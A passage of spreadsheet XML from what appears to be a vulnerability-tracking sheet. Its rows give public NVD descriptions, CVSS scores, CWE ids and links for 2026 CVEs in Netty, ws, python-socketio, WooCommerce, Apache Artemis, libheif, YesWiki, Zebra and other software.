        <v>0.006</v>
      </c>
      <c r="G2630" s="5" t="inlineStr"/>
      <c r="H2630" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2630" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2630" s="5" t="inlineStr"/>
      <c r="K2630" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="L2630" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-http2 prior to versions 4.1.135.Final and 4.2.15.Final, the `DelegatingDecompressorFrameListener` class orchestrates HTTP/2 decompression by embedding a per-stream `EmbeddedChannel` that runs the appropriate decompression codec (gzip, deflate, zstd) and forwards decompressed chunks to a wrapped listener. Each decompressed chunk is a pooled `ByteBuf` handed to an anonymous `ChannelInboundHandlerAdapter` tail handler, which becomes the sole owner responsible for releasing it. A remote peer could send frames that would result in the flow-controller throwing and so trigger a resource leak which at the end might take down the whole JVM due OOME. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48043</t>
        </is>
      </c>
    </row>
    <row r="2631">
      <c r="A2631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48486</t>
        </is>
      </c>
      <c r="C2631" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2631" s="5" t="inlineStr"/>
      <c r="F2631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2631" s="5" t="inlineStr"/>
      <c r="H2631" s="5" t="inlineStr"/>
      <c r="I2631" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2631" s="5" t="inlineStr"/>
      <c r="K2631" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2631" s="5" t="inlineStr">
        <is>
          <t>Signum Node is a HDD-mined cryptocurrency using an energy efficient and fair Proof-of-Commitment (PoC+) consensus algorithm. Prior to version 3.9.9, an integer overflow in BlockServiceImpl.applyBlock() allowed a miner to receive an arbitrarily inflated block reward by crafting a block with a negative totalFeeCashBackNqt value. The vulnerability was introduced when the SMART_FEES hardfork (block ~1,029,000) enabled fee cash-back and burn accounting without overflow protection. This issue has been patched in version 3.9.9.</t>
        </is>
      </c>
      <c r="M2631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48486</t>
        </is>
      </c>
    </row>
    <row r="2632">
      <c r="A2632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48779</t>
        </is>
      </c>
      <c r="C2632" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2632" s="5" t="inlineStr"/>
      <c r="F2632" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2632" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2632" s="5" t="inlineStr">
        <is>
          <t>ws_project:ws</t>
        </is>
      </c>
      <c r="I2632" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J2632" s="5" t="inlineStr"/>
      <c r="K2632" s="5" t="inlineStr">
        <is>
          <t>CWE-1050, CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2632" s="5" t="inlineStr">
        <is>
          <t>ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.</t>
        </is>
      </c>
      <c r="M2632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48779</t>
        </is>
      </c>
    </row>
    <row r="2633">
      <c r="A2633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48804</t>
        </is>
      </c>
      <c r="C2633" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2633" s="5" t="inlineStr"/>
      <c r="F2633" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2633" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2633" s="5" t="inlineStr"/>
      <c r="I2633" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2633" s="5" t="inlineStr"/>
      <c r="K2633" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2633" s="5" t="inlineStr">
        <is>
          <t>python-socketio is a Python implementation of the Socket.IO realtime client and server. The python-socketio server stores binary `EVENT` and `ACK` messages in memory while it waits to receive their binary attachments. Once all the attachments are received, these messages are then processed. Prior to version 5.16.4, an attacker can submit a binary message and intentionally omit sending one or more of its attachments to cause the message along with the partial list of received attachments to stay in memory for a long time. Version 5.16.4 takes the following measures to address this issue: Binary packets are only accepted from authenticated clients and, when a client disconnects, the server checks if there is a partial binary message being held for the client and deletes it.</t>
        </is>
      </c>
      <c r="M2633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48804</t>
        </is>
      </c>
    </row>
    <row r="2634">
      <c r="A2634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48888</t>
        </is>
      </c>
      <c r="C2634" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2634" s="5" t="inlineStr"/>
      <c r="F2634" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2634" s="5" t="inlineStr"/>
      <c r="H2634" s="5" t="inlineStr"/>
      <c r="I2634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2634" s="5" t="inlineStr"/>
      <c r="K2634" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2634" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.
This issue affects WooCommerce: from n/a before 11.1.0.</t>
        </is>
      </c>
      <c r="M2634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t>
        </is>
      </c>
    </row>
    <row r="2635">
      <c r="A2635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4926</t>
        </is>
      </c>
      <c r="C2635" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2635" s="5" t="inlineStr"/>
      <c r="F2635" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2635" s="5" t="inlineStr"/>
      <c r="H2635" s="5" t="inlineStr">
        <is>
          <t>pillarjs:path-to-regexp</t>
        </is>
      </c>
      <c r="I2635" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2635" s="5" t="inlineStr"/>
      <c r="K2635" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L2635" s="5" t="inlineStr">
        <is>
          <t>Impact:
A bad regular expression is generated any time you have multiple sequential optional groups (curly brace syntax), such as `{a}{b}{c}:z`. The generated regex grows exponentially with the number of groups, causing denial of service.
Patches:
Fixed in version 8.4.0.
Workarounds:
Limit the number of sequential optional groups in route patterns. Avoid passing user-controlled input as route patterns.</t>
        </is>
      </c>
      <c r="M2635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4926</t>
        </is>
      </c>
    </row>
    <row r="2636">
      <c r="A2636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49362</t>
        </is>
      </c>
      <c r="C2636" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2636" s="5" t="inlineStr"/>
      <c r="F2636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2636" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2636" s="5" t="inlineStr"/>
      <c r="I2636" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2636" s="5" t="inlineStr"/>
      <c r="K2636" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2636" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can create arbitrary durable queues via the CORE protocol, leading to unauthorized broker state manipulation and potential denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49362</t>
        </is>
      </c>
    </row>
    <row r="2637">
      <c r="A2637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49363</t>
        </is>
      </c>
      <c r="C2637" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2637" s="5" t="inlineStr"/>
      <c r="F2637" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2637" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2637" s="5" t="inlineStr"/>
      <c r="I2637" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2637" s="5" t="inlineStr"/>
      <c r="K2637" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2637" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker connecting with the CORE protocol can discover cluster node details by sending a SUBSCRIBE_TOPOLOGY request prior to authentication.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49363</t>
        </is>
      </c>
    </row>
    <row r="2638">
      <c r="A2638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50010</t>
        </is>
      </c>
      <c r="C2638" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2638" s="5" t="inlineStr"/>
      <c r="F2638" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2638" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H2638" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2638" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2638" s="5" t="inlineStr"/>
      <c r="K2638" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2638" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SimpleTrustManagerFactory.engineGetTrustManagers() and related paths wrap any user-supplied plain X509TrustManager in X509TrustManagerWrapper, which extends X509ExtendedTrustManager but implements the 3-arg checkServerTrusted(chain, authType, SSLEngine) by discarding the SSLEngine and calling the 2-arg delegate. Because the object now IS an X509ExtendedTrustManager, neither SunJSSE's internal AbstractTrustManagerWrapper nor Netty's own OpenSslX509TrustManagerWrapper will re-wrap it to add endpoint-identification. Consequently, even though Netty 4.2 sets endpointIdentificationAlgorithm="HTTPS" by default, a client built with `SslContextBuilder.forClient().trustManager(somePlainX509TrustManager)` performs no hostname verification at all. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50010</t>
        </is>
      </c>
    </row>
    <row r="2639">
      <c r="A2639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50011</t>
        </is>
      </c>
      <c r="C2639" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2639" s="5" t="inlineStr"/>
      <c r="F2639" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2639" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2639" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2639" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2639" s="5" t="inlineStr"/>
      <c r="K2639" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2639" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, RedisArrayAggregator pre-allocates ArrayList with initial capacity equal to the RESP array element count declared in an array header. That count is taken from the wire before the corresponding child messages exist. A small malicious header can claim a huge initial capacity. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50011</t>
        </is>
      </c>
    </row>
    <row r="2640">
      <c r="A2640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50142</t>
        </is>
      </c>
      <c r="C2640" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2640" s="5" t="inlineStr"/>
      <c r="F2640" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2640" s="5" t="inlineStr"/>
      <c r="H2640" s="5" t="inlineStr"/>
      <c r="I2640" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2640" s="5" t="inlineStr"/>
      <c r="K2640" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-770</t>
        </is>
      </c>
      <c r="L2640" s="5" t="inlineStr">
        <is>
          <t>libheif is a HEIF and AVIF file format decoder and encoder. From 1.19.0 until 1.23.0, a crafted HEIF sequence accepted by heif_context_read_from_memory() with the msf1 sequence brand can cause unbounded heap allocation. In libheif/sequences/seq_boxes.cc, Box_stsz::parse() applies max_sequence_frames only to variable-size samples, so fixed-size mode accepts an attacker-controlled sample_count without a bound. In libheif/sequences/track.cc, Track::load() also adds current_sample_idx and samples_per_chunk in 32-bit arithmetic, allowing the consistency check to be bypassed by wraparound. The resulting values reach the Chunk::Chunk() allocation path, which can consume gigabytes of memory and crash or stall the process through memory exhaustion. This issue is fixed in version 1.23.0.</t>
        </is>
      </c>
      <c r="M2640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50142</t>
        </is>
      </c>
    </row>
    <row r="2641">
      <c r="A2641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50578</t>
        </is>
      </c>
      <c r="C2641" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2641" s="5" t="inlineStr"/>
      <c r="F2641" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2641" s="5" t="inlineStr"/>
      <c r="H2641" s="5" t="inlineStr"/>
      <c r="I2641" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2641" s="5" t="inlineStr"/>
      <c r="K2641" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2641" s="5" t="inlineStr">
        <is>
          <t>ePA 3.x Integration implements the authorization workflow and writes Medical Information Objects to Germany's electronic patient record. Prior to 1.3.0, ePA 3.x Integration disables TLS certificate verification for both ePA connections in app/vau/VAUProtokoll.py and Konnektor connections in app/konnektor/Konnektor.py. A network-positioned attacker can present an arbitrary certificate, terminate the TLS connection, and intercept ePA traffic. The VAU protocol does not provide an effective fallback because its application-layer certificate validation is also broken in affected versions. The Konnektor session uses self.session.verify set to False while the client authenticates with self.session.cert, so an attacker impersonating the Konnektor can receive the client's mutual TLS certificate exchange and observe smartcard operations. This issue is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M2641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50578</t>
        </is>
      </c>
    </row>
    <row r="2642">
      <c r="A2642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50776</t>
        </is>
      </c>
      <c r="C2642" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2642" s="5" t="inlineStr"/>
      <c r="F2642" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G2642" s="5" t="inlineStr"/>
      <c r="H2642" s="5" t="inlineStr"/>
      <c r="I2642" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2642" s="5" t="inlineStr"/>
      <c r="K2642" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2642" s="5" t="inlineStr">
        <is>
          <t>Directory Traversal vulnerability in Pronis Loisirs Billetterie CSE - &lt; 04/2026 allows a remote attacker to obtain sensitive information and execute arbitrary code.</t>
        </is>
      </c>
      <c r="M2642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50776</t>
        </is>
      </c>
    </row>
    <row r="2643">
      <c r="A2643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51367</t>
        </is>
      </c>
      <c r="C2643" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2643" s="5" t="inlineStr"/>
      <c r="F2643" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2643" s="5" t="inlineStr"/>
      <c r="H2643" s="5" t="inlineStr"/>
      <c r="I2643" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2643" s="5" t="inlineStr"/>
      <c r="K2643" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2643" s="5" t="inlineStr">
        <is>
          <t>An issue in Bottinelli Informatica Vedo Suite v.1.2.5 allows a remote attacker to obtain sensitive information via the api_vedo/chat endpoint and the utente_chat parameter</t>
        </is>
      </c>
      <c r="M2643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51367</t>
        </is>
      </c>
    </row>
    <row r="2644">
      <c r="A2644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52023</t>
        </is>
      </c>
      <c r="C2644" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2644" s="5" t="inlineStr"/>
      <c r="F2644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2644" s="5" t="inlineStr"/>
      <c r="H2644" s="5" t="inlineStr"/>
      <c r="I2644" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2644" s="5" t="inlineStr"/>
      <c r="K2644" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2644" s="5" t="inlineStr">
        <is>
          <t>An issue in kamailio v.6.1.1 and before allows a remote attacker to cause a denial of service via the ims_registrar_pcscf module, specifically the pcscf_save_pending/save_pending path and security-agreement parsing in sec_agree.c:parse_sec_agree()</t>
        </is>
      </c>
      <c r="M2644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52023</t>
        </is>
      </c>
    </row>
    <row r="2645">
      <c r="A2645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52481</t>
        </is>
      </c>
      <c r="C2645" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2645" s="5" t="inlineStr"/>
      <c r="F2645" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2645" s="5" t="inlineStr"/>
      <c r="H2645" s="5" t="inlineStr"/>
      <c r="I2645" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2645" s="5" t="inlineStr"/>
      <c r="K2645" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2645" s="5" t="inlineStr">
        <is>
          <t>An issue in SJRC F11 SJ-GPS-PRO firmware build 2019-09-17 allows a remote attacker to obtain sensitive information via the tcp_actions() function</t>
        </is>
      </c>
      <c r="M2645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52481</t>
        </is>
      </c>
    </row>
    <row r="2646">
      <c r="A2646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52770</t>
        </is>
      </c>
      <c r="C2646" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2646" s="5" t="inlineStr"/>
      <c r="F2646" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2646" s="5" t="inlineStr"/>
      <c r="H2646" s="5" t="inlineStr"/>
      <c r="I2646" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2646" s="5" t="inlineStr"/>
      <c r="K2646" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2646" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki’s public Bazar entry-listing APIs are vulnerable to unauthenticated SQL injection in numeric query / queries filters. For Bazar fields whose value structure is numeric, YesWiki escapes the attacker-controlled filter value but inserts it into SQL without quotes or numeric validation. An unauthenticated attacker can inject boolean SQL expressions and infer database contents from whether entries are returned. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M2646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52770</t>
        </is>
      </c>
    </row>
    <row r="2647">
      <c r="A2647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52829</t>
        </is>
      </c>
      <c r="C2647" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2647" s="5" t="inlineStr"/>
      <c r="F2647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2647" s="5" t="inlineStr"/>
      <c r="H2647" s="5" t="inlineStr"/>
      <c r="I2647" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2647" s="5" t="inlineStr"/>
      <c r="K2647" s="5" t="inlineStr">
        <is>
          <t>CWE-617, CWE-843</t>
        </is>
      </c>
      <c r="L2647" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, an unauthenticated IPv4 peer can deterministically terminate a synced Zebra node using the default Linux dual-stack listener configuration. The handshake path canonicalized an IPv4-mapped IPv6 PeerSocketAddr such as ::ffff:127.0.0.1 to plain IPv4 before storing it through MetaAddr::new_connected, but the mempool misbehavior path forwarded the raw transient address to MetaAddrChange::UpdateMisbehavior. In zebra-network/src/meta_addr.rs, apply_to_meta_addr then compared the canonical address-book entry with the raw update address and reached its unexpected address mismatch assertion. After the misbehavior batch flush, panic equals abort terminated zebrad; the peer only needed to complete a P2P handshake and advertise an invalid mempool transaction. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M2647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52829</t>
        </is>
      </c>
    </row>
    <row r="2648">
      <c r="A2648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52856</t>
        </is>
      </c>
      <c r="C2648" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2648" s="5" t="inlineStr"/>
      <c r="F2648" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2648" s="5" t="inlineStr"/>
      <c r="H2648" s="5" t="inlineStr"/>
      <c r="I2648" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2648" s="5" t="inlineStr"/>
      <c r="K2648" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-248, CWE-617, CWE-755</t>
        </is>
      </c>
      <c r="L2648" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to 1.13.0, a malformed packet received during the SFTP connection handshake causes a Go panic. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="M2648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52856</t>
        </is>
      </c>
    </row>
    <row r="2649">
      <c r="A2649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52878</t>
        </is>
      </c>
      <c r="C2649" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2649" s="5" t="inlineStr"/>
      <c r="F2649" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2649" s="5" t="inlineStr"/>
      <c r="H2649" s="5" t="inlineStr"/>
      <c r="I2649" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2649" s="5" t="inlineStr"/>
      <c r="K2649" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2649" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Versions 1.7.14 through 1.7.17 are vulnerable to a nil-pointer panic triggered by a protobuf Transaction whose embedded RawData sub-message is omitted. This omission causes RawData to decode to nil. Every transaction gossiped on the Klever-Go P2P network is decoded and validated synchronously inside the libp2p pubsub topic-validator callback, where txVersionChecker.CheckTxVersion dereferences tx.RawData.Version with no nil check. Because the libp2p pubsub callback, the underlying go-libp2p-pubsub validation worker, and Klever's own network/p2p layer install no recover(), the panic propagates and crashes the entire node process. The attacker payload is a 3-byte protobuf message; no validator key, stake, funds, or on-chain account is required, and delivery aimed at enough of the BLS validator set can halt block production, resulting in a chain halt. This issue has been fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M2649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52878</t>
